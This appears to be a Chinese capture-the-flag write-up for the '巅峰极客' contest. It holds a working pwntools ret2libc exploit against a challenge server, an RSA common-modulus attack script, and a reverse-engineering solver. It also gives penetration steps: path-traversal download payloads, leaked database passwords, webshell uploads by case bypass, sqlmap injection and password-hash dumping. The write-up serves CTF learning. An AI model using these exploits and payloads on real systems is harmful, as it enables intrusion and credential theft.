巅峰极客
这是一道比较简单的PWN题目,首先拖到IDA里简单看了一下程序,如图
发现在读取,没有栈保护,所以,在read 0x34时,可能替换game返回址址,先通过write(1,write,4) (game 作为write返回地址)。这样读出write地址,这样就可以得到system地址,因为又循环运行了,同样在0x804A06C写入/bin/sh\0,这样system就能运行。
Python exp如下:
from pwn import * def rungameAgainPoc(p,yourname,flag): p.recvuntil("First, what's your name?\n") p.send(yourname + "\n") p.recvuntil("do you want to get flag?\n") p.send(flag) pwnelf = ELF("./pwn") libcelf = ELF("./libc-2.23.so") gameadd = 0x080485CB plt_write = pwnelf.symbols['write'] got_write = pwnelf.got['write'] #p = process('./pwn',env={'LD_PRELOAD':'./libc-2.23.so'}) p = remote('117.50.60.184', 12345) rungameAgainPoc(p,"ichuqiu","0"*32 + p32(plt_write)+ p32(gameadd) + p32(1) + p32(got_write) + p32(4)) write_addr = u32(p.recv(4)) print "pwn write " ,hex(write_addr) libcelf_system_add = libcelf.symbols["system"] + write_addr - libcelf.symbols["write"] print "pwn libcelf_system_add",hex(libcelf_system_add) rungameAgainPoc(p,"/bin/sh\0","0"*32 + p32(libcelf_system_add)+p32(gameadd) + p32(0x804A06C)) p.interactive()
flag{62c51c85-1516-4ad8-989c-58ce8c29642e}
IDA查找关键函数,发现有一个循环比较
初步判断,是一个8位数,于是分开比较
#[ebp+var_6C] 01050D02070106010206000B07010C06 #[ebp+var_4C] 02080602 #[ebp+var_5C] 0100070D020108080D000103040D0303 #[ebp+var_48] 02050009 #[ebp+var_44] 00000D02
def cover(buf): buf = buf.decode("hex") rbuf = "" for i in range(len(buf) - 1,-1,-1): rbuf += buf[i] return rbuf def cover_hex_lines(buf): return buf.replace(" ","").replace("\r","").replace("\n","").decode("hex") var_6c =cover("01050D02070106010206000B07010C06") + cover("0100070D020108080D000103040D0303") + cover("02080602") + cover("02050009") + cover("00000D02") #print len(var_6c)
def cover(buf): buf = buf.decode("hex") rbuf = "" for i in range(len(buf) - 1,-1,-1): rbuf += buf[i] return rbuf def cover_hex_lines(buf): return buf.replace(" ","").replace("\r","").replace("\n","").decode("hex") var_6c =cover("01050D02070106010206000B07010C06") + cover("0100070D020108080D000103040D0303") + cover("02080602") + cover("02050009") + cover("00000D02") #print len(var_6c) byte_402178 = """02 02 02 02 03 01 01 02 01 01 02 01 01 00 01 01 02 02 00 01 01 01 01 00 01 01 02 02 00 01 01 02 02 01 01 01 01 01 02 01 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01 06 0C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01 00 00 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00 48 00 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00 2C 23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00 0D 00 00 00 54 02 00 00 40 23 00 00 40 17 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00 0E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 00 E0 22 40 00 01 00 00 00 E8 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00""" .replace(" ","").replace("\r","").replace("\n","").decode("hex") byte_402138 = """00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00 0A 00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00 0E 00 00 00 0F 00 00 00""" .replace(" ","").replace("\r","").replace("\n","").decode("hex") dword_403018="""02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 """.replace(" ","").replace("\r","").replace("\n","").decode("hex")
#text:0040110E mov ecx, [ebp+var_4] #.text:00401111 xor ecx, ebp #.text:00401113 mov dword_40301C, 3 #.text:0040111D mov dword_403020, 6 #.text:00401127 mov dword_403024, 7
#内存值有所改变,所以修改一下
dword_403018 = dword_403018[0:4] + '\x03' + dword_403018[5:8] + '\x06' + dword_403018[9:12] + '\x07' + dword_403018[13:] print dword_403018.encode("hex") for i in range(0,42): hightnum = ord(dword_403018[ord(byte_402178[i])*4])<<4 numbershow = hightnum+ ord(byte_402138[ord(var_6c[i])*4]) print chr(numbershow), flag{06b16a72-51cc-4310-88ab-70ab68290e22}
本题是sql约束攻击,注册用户名为“admin ”,密码为符合规定的密码就可以,然后登陆就能看到flag
本题是sql约束攻击,注册用户名为“admin ”,密码为符合规定的密码就可以,然后登陆就能看到flag
这算是一道签到题,word文件内容要求关注比赛官方平台公众号,回复“部分flag”,获得flag{71d7ce04-197a-4d,将doc文件重命名ZIP解压,在document.xml发现第二部分flag b3-9c1d-0c419406a594}
flag{71d7ce04-197a-4db3-9c1d-0c419406a594}
openssl rsa -inform PEM -in pubkey1.pem -pubin -text Public-Key: (2048 bit) Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17 Exponent: 2333 (0x91d) openssl rsa -inform PEM -in pubkey2.pem -pubin -text Public-Key: (2048 bit) Modulus: 00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66: 42:17 Exponent: 23333 (0x5b25).
可见,这两个公钥n是一样的,只是e不同,使用RSA的共模攻击
Python 如下:
from libnum import n2s,s2n from gmpy2 import invert import base64 import gmpy2 def bignumber(n): n = n.decode("hex") rn = 0 for b in n: rn = rn << 8 rn += ord(b) return rn n = """00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df: 3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d: 8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e: bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da: a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4: c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a: dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e: ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42: 4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48: 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17: 03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8: 79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9: ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95: 2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7: e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb: e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a: 8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:42:17""" .replace(":","").replace(" ","").replace("\r","").replace("\n","") #print n n = bignumber(n) print hex(n) e1 = 2333 e2 =23333 def egcd(a,b): if a == 0: return (b,0,1) else: g,y,x = egcd(b%a,a) return (g,x - (b //a)*y,y) flag1 = base64.b64decode(open("flag1.enc","rb").read()) flag2 = base64.b64decode(open("flag2.enc","rb").read()) c1 = s2n(flag1) c2 = s2n(flag2) c2 = invert(c2,n) #s = egcd(e1,e2) #print s s = gmpy2.gcdext(e1,e2) #print s s1 = s[1] s2 = 0 - s[2] print s1 print s2 m = pow(c1,s1,n) * pow(c2,s2,n)%n print n2s(m)
flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe}
1.根据CMS版本,在wooyun镜像站找到漏洞细节,
网站存在注入,但是数据库用户表为空,另外发现发现文件下载漏洞,
down.php?urls=data/../config.php
下载文件发现DB_user/mvoa用户的密码
define('DB_PWD','B!hpp3Dn1.');
flag值:B!hpp3Dn1.
2.http://url/www.zip,获得网站备份文件,在config.php发现DB_user/root用户的密码
define('DB_PWD','mypasswd');
flag值:mypasswd
1.发现下载路径
/u-are-admin/download.php?dl=
显示文件找不到(u-Are-Admin/u-upload-file文件夹),发现关键目录
/u-Are-Admin/
flag值:/u-Are-Admin/
2.在/u-Are-Admin/目录,可以上传文件,上传Php(大小写绕过)一句话木马,菜刀链接,net user查看系统管理员Hack用户的全名
flag值:Hacked356
3.shell能够直接查看超级管理员用户桌面根目录admin.txt文件的内容
flag值:ad16a159581c7085c771f
1.AWVS扫到注入点
/cat.php?id=2
sqlmap直接能跑,通过注入即可获得后台管理员明文密码,serverlog
flag值:serverlog
2.注入也能获取root的密码hash,
*21C5210729A90C69019F01FED76FAD4654F27167
然后cmd5解密得rootserver
flag值:rootserver
3.登录进去,Download log那里下载日志的地方,可以下载任意文件,可获取C盘根目录password.txt内容
/classes/downloadfile.php?file=../../../../../../password.txt
flag值:c9c35cf409344312146fa7546a94d1a6
1.AWVS扫到./git源码泄露,用工具GitHack下载所有源码,在数据库文件发现用户名,密码(admin Admin@pgsql)
flag值:Admin@pgsql
2.用用户名密码登录,管理图片可以上传一句话木马的图片,然后看到图片的地址,把地址去掉small,即使文件真正地址,/admin/uploads/111.php.png
直接菜刀链接,png也能当成php直接解析,然后虚拟终端net user即可获得系统管理员ichunqiu用户的全名。
3.菜刀能够直接查看/tmp/access.log的内容的前16位
1.扫描器扫到一个文件包含和一个大马的txt文件,然后getshell,构造路径为
url/info/include.php?filename=..//sjk-uploads/UareHack.txt密码是a,拿到shell可以获取phpStudy目录下Documents.txt的内容
2.拿到shell可以获取ichunqiu用户Desktop根目录password.txt的内容
3.getshell后,传msf木马无法反弹,最后使用QuarksPwDump拿到了ichunqiu用户密码HASH,在线破解拿到密码
78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::
flag值:123qwe123